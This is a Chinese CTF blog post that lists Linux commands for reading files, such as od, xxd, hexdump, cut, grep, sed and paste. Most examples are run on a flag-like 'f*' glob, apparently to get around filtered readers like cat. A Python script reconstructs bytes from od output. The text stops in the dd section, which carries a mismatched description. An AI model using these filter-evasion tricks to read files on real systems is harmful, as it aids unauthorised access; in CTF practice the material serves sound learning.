<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="各种读取文件的命令123456789101112131415161718192021cat tacnlmore lessbzmore bzlesshead tailvi vim nano strings od hexdump xxd base64tee sed cut grep awksort  uniq rev  pastesource sh bash .curldatefiledddiff#p">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux各种读取文件的命令">
<meta property="og:url" content="http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="各种读取文件的命令123456789101112131415161718192021cat tacnlmore lessbzmore bzlesshead tailvi vim nano strings od hexdump xxd base64tee sed cut grep awksort  uniq rev  pastesource sh bash .curldatefiledddiff#p">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260123150152079.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124183849193.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124202409204.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124203704387.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124203448927.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124204152834.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124204532374.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124205325419.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124205656690.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126175156750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126180248292.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126182055358.png">
<meta property="article:published_time" content="2026-01-28T10:32:32.000Z">
<meta property="article:modified_time" content="2026-01-28T10:37:01.824Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="shell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260123150152079.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Linux各种读取文件的命令</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="Hexo" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/lierbushiwo">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2026/01/28/bash%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6rce/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/01/26/%E9%B9%8F%E5%9F%8E%E6%9D%AF2025-web/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&text=Linux各种读取文件的命令"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&is_video=false&description=Linux各种读取文件的命令"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Linux各种读取文件的命令&body=Check out this article: http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&name=Linux各种读取文件的命令&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&t=Linux各种读取文件的命令"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">各种读取文件的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#xxd"><span class="toc-number">1.1.</span> <span class="toc-text">xxd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#od"><span class="toc-number">1.2.</span> <span class="toc-text">od</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hexdump"><span class="toc-number">1.3.</span> <span class="toc-text">hexdump</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cut"><span class="toc-number">1.4.</span> <span class="toc-text">cut</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#tee"><span class="toc-number">1.5.</span> <span class="toc-text">tee</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#grep"><span class="toc-number">1.6.</span> <span class="toc-text">grep</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file"><span class="toc-number">1.7.</span> <span class="toc-text">file</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sed"><span class="toc-number">1.8.</span> <span class="toc-text">sed</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#paste"><span class="toc-number">1.9.</span> <span class="toc-text">paste</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dd"><span class="toc-number">1.10.</span> <span class="toc-text">dd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#date"><span class="toc-number">1.11.</span> <span class="toc-text">date</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#diff"><span class="toc-number">1.12.</span> <span class="toc-text">diff</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#source"><span class="toc-number">1.13.</span> <span class="toc-text">source</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#awk"><span class="toc-number">1.14.</span> <span class="toc-text">awk</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#curl"><span class="toc-number">1.15.</span> <span class="toc-text">curl</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Linux各种读取文件的命令
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-01-28T10:32:32.000Z" class="dt-published" itemprop="datePublished">2026-01-28</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/CTF/" rel="tag">CTF</a>, <a class="p-category" href="/tags/Linux/" rel="tag">Linux</a>, <a class="p-category" href="/tags/shell/" rel="tag">shell</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="各种读取文件的命令"><a href="#各种读取文件的命令" class="headerlink" title="各种读取文件的命令"></a>各种读取文件的命令</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> <span class="built_in">tac</span></span><br><span class="line"><span class="built_in">nl</span></span><br><span class="line">more less</span><br><span class="line">bzmore bzless</span><br><span class="line"><span class="built_in">head</span> <span class="built_in">tail</span></span><br><span class="line">vi vim nano </span><br><span class="line">strings </span><br><span class="line"><span class="built_in">od</span> hexdump xxd <span class="built_in">base64</span></span><br><span class="line"><span class="built_in">tee</span> sed <span class="built_in">cut</span> grep awk</span><br><span class="line"><span class="built_in">sort</span>  <span class="built_in">uniq</span> rev  <span class="built_in">paste</span></span><br><span class="line"><span class="built_in">source</span> sh bash .</span><br><span class="line">curl</span><br><span class="line"><span class="built_in">date</span></span><br><span class="line">file</span><br><span class="line"><span class="built_in">dd</span></span><br><span class="line">diff</span><br><span class="line"></span><br><span class="line"><span class="comment">#php cli参数</span></span><br><span class="line">-s  输出突出显示的HTML语法源</span><br><span class="line">-r  在不使用脚本标签的情况下运行PHP代码”&lt;?..?&gt; <span class="string">&#x27;</span></span><br><span class="line"><span class="string">man </span></span><br></pre></td></tr></table></figure>

<h3 id="xxd"><a href="#xxd" class="headerlink" title="xxd"></a><code>xxd</code></h3><ul>
<li><code>-r</code>：将十六进制数据还原为二进制（反向操作）。</li>
<li><code>-p</code>：以连续的纯十六进制形式（不带偏移地址和 ASCII）输出。</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260123150152079.png" alt="image-20260123150152013"></p>
<blockquote>
<p><code>echo -n</code> 避免在字符后加换行符，默认输出时有换行符</p>
<p><code>xxd -r</code>期望的输入格式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">00000000: 4865 6c6c 6f0a</span><br></pre></td></tr></table></figure>

<p><code>xxd -r -p</code> 期望的输入格式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">48656c6c6f0a</span><br></pre></td></tr></table></figure></blockquote>
<h3 id="od"><a href="#od" class="headerlink" title="od"></a><code>od</code></h3><blockquote>
<p>输出文件的八进制、十六进制等格式编码的字节(默认八进制)</p>
</blockquote>
<ul>
<li><code>-c</code> 使用ASCII码进行输出，注意其中包括转义字符</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">od</span> -c f*</span><br><span class="line"><span class="built_in">od</span> f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124183849193.png" alt="image-20260124183849005"></p>
<p>app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse_od_octal_line</span>(<span class="params">line: <span class="built_in">str</span></span>) -&gt; <span class="built_in">bytes</span>:</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    解析一行 od 八进制输出（如 &quot;0000000 066146 063541 ...&quot;）</span></span><br><span class="line"><span class="string">    返回对应的字节数据（按小端序拆分）</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    parts = line.strip().split()</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> parts:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">b&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 跳过偏移地址（通常是第一个字段，且长度为7的纯八进制数）</span></span><br><span class="line">    data_parts = []</span><br><span class="line">    <span class="keyword">for</span> part <span class="keyword">in</span> parts:</span><br><span class="line">        <span class="keyword">if</span> re.fullmatch(<span class="string">r&#x27;[0-7]&#123;6&#125;&#x27;</span>, part):  <span class="comment"># 6位八进制 = 2字节</span></span><br><span class="line">            data_parts.append(part)</span><br><span class="line">        <span class="keyword">elif</span> re.fullmatch(<span class="string">r&#x27;[0-7]&#123;3&#125;&#x27;</span>, part) <span class="keyword">and</span> <span class="built_in">len</span>(parts) == <span class="number">1</span>:</span><br><span class="line">            <span class="comment"># 单独的3位可能是末尾单字节（但 od 默认不会这样输出）</span></span><br><span class="line">            data_parts.append(part)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> data_parts:</span><br><span class="line">        <span class="comment"># 如果没找到6位组，尝试从第2个字段开始（跳过偏移）</span></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(parts) &gt; <span class="number">1</span> <span class="keyword">and</span> re.fullmatch(<span class="string">r&#x27;[0-7]+&#x27;</span>, parts[<span class="number">0</span>]) <span class="keyword">and</span> <span class="built_in">len</span>(parts[<span class="number">0</span>]) &lt;= <span class="number">8</span>:</span><br><span class="line">            data_parts = [p <span class="keyword">for</span> p <span class="keyword">in</span> parts[<span class="number">1</span>:] <span class="keyword">if</span> re.fullmatch(<span class="string">r&#x27;[0-7]&#123;6&#125;&#x27;</span>, p)]</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">bytearray</span>()</span><br><span class="line">    <span class="keyword">for</span> octal_pair <span class="keyword">in</span> data_parts:</span><br><span class="line">        <span class="comment"># 将6位八进制转为整数</span></span><br><span class="line">        val = <span class="built_in">int</span>(octal_pair, <span class="number">8</span>)</span><br><span class="line">        <span class="comment"># x86 是小端序：低字节在前</span></span><br><span class="line">        low_byte = val &amp; <span class="number">0xFF</span></span><br><span class="line">        high_byte = (val &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span></span><br><span class="line">        result.append(low_byte)</span><br><span class="line">        result.append(high_byte)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(result)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">restore_from_od_output</span>(<span class="params">od_text: <span class="built_in">str</span></span>) -&gt; <span class="built_in">bytes</span>:</span><br><span class="line">    lines = od_text.strip().splitlines()</span><br><span class="line">    full_data = <span class="built_in">bytearray</span>()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">        <span class="comment"># 跳过最后一行（文件长度行，如 &quot;0000015&quot;）</span></span><br><span class="line">        <span class="keyword">if</span> re.fullmatch(<span class="string">r&#x27;\s*[0-7]+\s*&#x27;</span>, line) <span class="keyword">and</span> <span class="built_in">len</span>(line.strip()) &lt;= <span class="number">8</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="comment"># 跳过空行</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> line.strip():</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="comment"># 解析数据行</span></span><br><span class="line">        full_data.extend(parse_od_octal_line(line))</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(full_data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) != <span class="number">2</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Usage: python3 restore_od.py &lt;od_output_file&gt;&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Example: python3 restore_od.py od.txt&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;\nYour od output should look like:&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;0000000 066146 063541 060573 073544 060544 076567 000012&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;0000015&quot;</span>)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(sys.argv[<span class="number">1</span>], <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            od_content = f.read()</span><br><span class="line">        </span><br><span class="line">        raw_bytes = restore_from_od_output(od_content)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 尝试 UTF-8 解码（CTF flag 通常是 ASCII/UTF-8）</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            text = raw_bytes.decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;✅ Recovered text:&quot;</span>)</span><br><span class="line">            <span class="built_in">print</span>(text)</span><br><span class="line">        <span class="keyword">except</span> UnicodeDecodeError:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;⚠️  Raw bytes (not valid UTF-8):&quot;</span>)</span><br><span class="line">            <span class="built_in">print</span>(raw_bytes.<span class="built_in">hex</span>())</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 保存为二进制文件（以防需要进一步分析）</span></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;recovered.bin&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> out:</span><br><span class="line">            out.write(raw_bytes)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;\n💾 Binary saved to &#x27;recovered.bin&#x27; (<span class="subst">&#123;<span class="built_in">len</span>(raw_bytes)&#125;</span> bytes)&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;❌ Error: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<h3 id="hexdump"><a href="#hexdump" class="headerlink" title="hexdump"></a><code>hexdump</code></h3><blockquote>
<p>类似<code>od</code></p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hexdump -c f*</span><br></pre></td></tr></table></figure>

<h3 id="cut"><a href="#cut" class="headerlink" title="cut"></a><code>cut</code></h3><blockquote>
<p>cut命令用来显示行中的指定部分，删除文件中指定字段。cut经常用来显示文件的内容</p>
<p>cut命令可以将一串字符作为列来显示，字符字段的记法：</p>
<p>N-：从第N个字节、字符、字段到结尾；<br>N-M：从第N个字节、字符、字段到第M个（包括M在内）字节、字符、字段；<br>-M：从第1个字节、字符、字段到第M个（包括M在内）字节、字符、字段。<br>上面是记法，结合下面选项将摸个范围的字节、字符指定为字段：</p>
<p>-b 表示字节；<br>-c 表示字符；<br>-f 表示定义字段。<br>转载请注明出处:<a target="_blank" rel="noopener" href="https://man.niaoge.com/cut">https://man.niaoge.com/cut</a></p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cut</span> -c1- f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124202409204.png" alt="image-20260124202409080"></p>
<h3 id="tee"><a href="#tee" class="headerlink" title="tee"></a><code>tee</code></h3><blockquote>
<p>tee命令用于将数据重定向到文件，另一方面还可以提供一份重定向数据的副本作为后续命令的stdin。简单的说就是把数据重定向到给定文件和屏幕上。<br><a target="_blank" rel="noopener" href="https://man.niaoge.com/tee">https://man.niaoge.com/tee</a></p>
</blockquote>
<h3 id="grep"><a href="#grep" class="headerlink" title="grep"></a><code>grep</code></h3><blockquote>
<p>grep（global search regular expression(RE) and print out the line，全面搜索正则表达式并把行打印出来）是一种强大的文本搜索工具，它能使用正则表达式搜索文本，并把匹配的行打印出来。<br>转载请注明出处:<a target="_blank" rel="noopener" href="https://man.niaoge.com/grep">https://man.niaoge.com/grep</a></p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep f f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124203704387.png" alt="image-20260124203704261"></p>
<h3 id="file"><a href="#file" class="headerlink" title="file"></a><code>file</code></h3><p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124203448927.png" alt="image-20260124203448810"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file -f f*</span><br></pre></td></tr></table></figure>

<h3 id="sed"><a href="#sed" class="headerlink" title="sed"></a><code>sed</code></h3><blockquote>
<p>sed是一种流编辑器，它是文本处理中非常中的工具，能够完美的配合正则表达式使用，功能不同凡响。处理时，把当前处理的行存储在临时缓冲区中，称为“模式空间”（pattern space），接着用sed命令处理缓冲区中的内容，处理完成后，把缓冲区的内容送往屏幕。接着处理下一行，这样不断重复，直到文件末尾。文件内容并没有 改变，除非你使用重定向存储输出。Sed主要用来自动编辑一个或多个文件；简化对文件的反复操作；编写转换程序等。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sed [options] <span class="string">&#x27;command&#x27;</span> file(s)</span><br></pre></td></tr></table></figure>

<p>转载请注明出处:<a target="_blank" rel="noopener" href="https://man.niaoge.com/sed">https://man.niaoge.com/sed</a></p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sed p f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124204152834.png" alt="image-20260124204152716"></p>
<h3 id="paste"><a href="#paste" class="headerlink" title="paste"></a><code>paste</code></h3><blockquote>
<p>paste命令用于将多个文件按照列队列进行合并。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">paste</span> f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124204532374.png" alt="image-20260124204532238"></p>
<h3 id="dd"><a href="#dd" class="headerlink" title="dd"></a><code>dd</code></h3><blockquote>
<p>功能描述: 格式化显示手册页</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if=      从哪里读取输入</span><br></pre></td></tr></table></figure></blockquote>
